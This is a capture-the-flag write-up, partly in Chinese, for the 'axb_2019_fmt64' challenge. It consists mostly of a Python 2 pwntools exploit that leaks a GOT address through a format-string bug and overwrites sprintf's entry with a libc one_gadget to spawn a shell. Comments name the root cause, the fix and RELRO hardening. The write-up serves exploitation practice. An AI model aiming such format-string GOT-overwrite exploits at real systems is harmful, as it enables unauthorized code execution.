axb_2019_fmt64
exp
有格式化字符串漏洞,泄露got表地址,改sprintf为one_gadget,当函数再次调用sprintf即可拿shell。(使用格式化漏洞任意写的时候注意printf已经先输出了9个字符,要减去)
# Python 2 pwntools script (print statements; str and p64() bytes are
# concatenated directly, which only works on Python 2).
#
# Root cause being demonstrated: user input reaches a printf-family call as the
# *format* argument. The fix on the application side is a constant format
# (e.g. printf("%s", buf)); the GOT overwrite below only works because the GOT
# is writable at runtime (no Full RELRO), so RELRO is the relevant hardening.
from pwn import *
#context.log_level = 'debug'
#io = process('./idaidg/linux_server64')
io = remote('node3.buuoj.cn',29548)
#io = process('axb_2019_fmt64')
elf = ELF('./axb_2019_fmt64')
#libc = elf.libc
libc = ELF('./libc/libc-2.23.so')
# Offsets into the specific libc build loaded above; only index 0 is used.
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
sprintf_got = elf.got['sprintf']
# Leak stage: '%9$s' dereferences the 9th format argument as a string
# pointer; the GOT address appended after the 8-byte prefix is presumably
# what lands in that slot (offset not shown on this page -- verify with a
# debugger).
payload = '%9$saaaa'
payload += p64(sprintf_got)
io.recvuntil("Please tell me:")
io.sendline(payload)
# Assumes the leaked value is a 6-byte little-endian userland pointer whose
# top byte is 0x7f; zero-extend to 8 bytes before unpacking.
sprintf_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print "sprintf_addr:"+hex(sprintf_addr)
libcbase = sprintf_addr - libc.symbols['sprintf']
# Rebinds the name from the offset list to the resolved absolute address.
one_gadget = libcbase + one_gadget[0]
print "one_gadget:"+hex(one_gadget)
# Write stage: two 2-byte '%hn' writes cover the low 32 bits of the GOT entry.
# The first width subtracts 9 because the program has already emitted 9
# characters before this output is counted (see the note above the script).
payload = ''
payload += '%' + str((one_gadget % 0x10000) - 9) + 'c%12$hn'
# Second width is relative to the first, since %n counts cumulative output.
payload += '%' + str(((one_gadget >> 16) % 0x10000) - (one_gadget % 0x10000)) + 'c%13$hn'
# Pad to 0x20 so the two target addresses presumably sit at format
# arguments 12 and 13 -- TODO confirm the stack layout.
payload = payload.ljust(0x20,'\x00')
payload += p64(sprintf_got) + p64(sprintf_got + 2)
print 'payload:'+payload
io.sendline(payload)
io.interactive()